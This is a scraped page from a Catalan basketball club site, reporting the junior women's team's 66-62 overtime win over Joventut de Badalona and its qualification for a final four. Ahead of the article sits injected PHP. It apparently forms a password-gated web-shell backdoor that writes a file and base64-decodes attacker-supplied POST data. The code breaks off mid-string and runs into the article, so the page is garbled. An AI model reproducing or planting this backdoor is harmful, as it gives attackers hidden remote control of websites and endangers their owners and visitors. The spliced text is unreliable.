function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior femení 1r any es classifica per la final a 4 gràcies a la victòria contra el Joventut de Badalona 66-62 - Tgn Bàsquet Club -

El Júnior femení 1r any es classifica per la final a 4 gràcies a la victòria contra el Joventut de Badalona 66-62

Updated: juny 4, 2021

El Júnior femení s’ha classificat per jugar la final a quatre de la categoria júnior de primer any després de superar el partit eliminatori contra el Joventut de Badalona. En el partit d’anada les liles van guanyar 60-68, sobreposant-se a un inici molt fluix per remuntar i poder afrontar el partit a casa amb vuit punts de renda. El partit de dissabte va tenir els seus alt i baixos amb un equip incomplert per culpa de les lesions. El Joventut necessitava guanyar amb una diferència de vuit punts a les tarragonines per passar de la fase eliminatòria i en alguns moment semblava que ho podrien aconseguir, però l’immens esforç i la gran capacitat de decisió del TGN va ser la clau per endur-se la victòria. El quart quart va ser el més irregular de les tarragonines. Va acabar amb el marcador en empat, cosa que va forçar una pròrroga. Però l’empat seguia beneficiant el TGN, ja que l’anterior partit l’havien guanyat de vuit. Per tant es va jugar un període extra per la badada dels entrenadors i la desconeixença de l’àrbitre. Tot a això les liles van pujar el ritme i van sentenciar el partit amb un resultat final 66-62.

El pròxim partit de les juniors serà una semifinal per determinar qui queda primer del grup i per tant la posició als encreuaments de la final a quatre. Els equips que jugaran aquesta final són el Sabadell, el Joviat, l’U.E. Mataró i el TGN.  El partit d’anada es disputarà a casa divendres dia 11 a les 20:00 contra l’U.E. Mataró. La tornada serà el dia següent a Mataró a les 19:00.